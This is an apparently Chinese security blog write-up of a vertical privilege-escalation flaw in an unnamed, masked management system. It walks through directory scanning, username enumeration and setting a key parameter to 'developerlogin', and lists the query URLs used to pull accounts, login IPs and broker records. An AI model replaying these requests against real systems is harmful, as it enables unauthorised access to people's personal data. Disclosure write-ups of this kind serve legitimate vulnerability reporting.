某管理系统存在垂直越权为管理员漏洞

华盟原创文章投稿奖励计划

某管理系统存在垂直越权为管理员漏洞

Url:http://****.com/

某管理系统存在垂直越权为管理员漏洞

通过dirsearch得到后台开发者路径

某管理系统存在垂直越权为管理员漏洞

后台开发登录后台之间填写Url进入到开发者功能区域:

http://****.com/developerlogin/

某管理系统存在垂直越权为管理员漏洞


对存在的用户进行字典枚举出三名用户,但没有获取到密码

某管理系统存在垂直越权为管理员漏洞

重新截获/deverloplogin/页面,发现payload:key=*****

某管理系统存在垂直越权为管理员漏洞

测试得知三种点击查询有三种接口查询功能:

信息查询

http://****.com/developer?key=****&act=accountQuery&accountQueryType=mobilePhone&accountQueryValue=

http://****.com/developer?key=****&act=accountQuery&accountQueryType=accountName&accountQueryValue=

http://****.com/developer?key=****&act=accountQuery&accountQueryType=accountId&accountQueryValu

登记信息查询

http://****.com/developer?key=****&act=accountLoginQuery&accountQueryType=mobilePhone&accountQueryValue=&loginStartTime=&loginEndTime=

http://****.com/developer?key=****&act=accountLoginQuery&accountQueryType=accountName&accountQueryValue=&loginStartTime=&loginEndTime=

http://****.com/developer?key=****&act=accountLoginQuery&accountQueryType=accountId&accountQueryValue=&loginStartTime=&loginEndTime=

经纪人查询同理

http://****.com/developer?key=****&act=brokerQuery&accountQueryType=accountName&accountQueryValue=

经过不断尝试key=****修改后尝试key=developerlogin得到管理员(开发者)查询权限,垂直越权,进行管理员全局查询。

某管理系统存在垂直越权为管理员漏洞

网页修改url查看存在的11用户:

某管理系统存在垂直越权为管理员漏洞

登录信息查询接口

http://****.com/developer?key=developerlogin&act=accountLoginQuery&accountQueryType=accountId&accountQueryValue=123&loginStartTime=20150101&loginEndTime=20210101

获取2015-2021的登录ip地址

某管理系统存在垂直越权为管理员漏洞

经纪人信息查询接口:

http://****.com/developer?key=developerlogin&act=brokerQuery&accountQueryType=accountId&accountQueryValue=123456

www.idc126.com

提交结果:

某管理系统存在垂直越权为管理员漏洞

本文原创,作者:congtou,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/279001.html

发表评论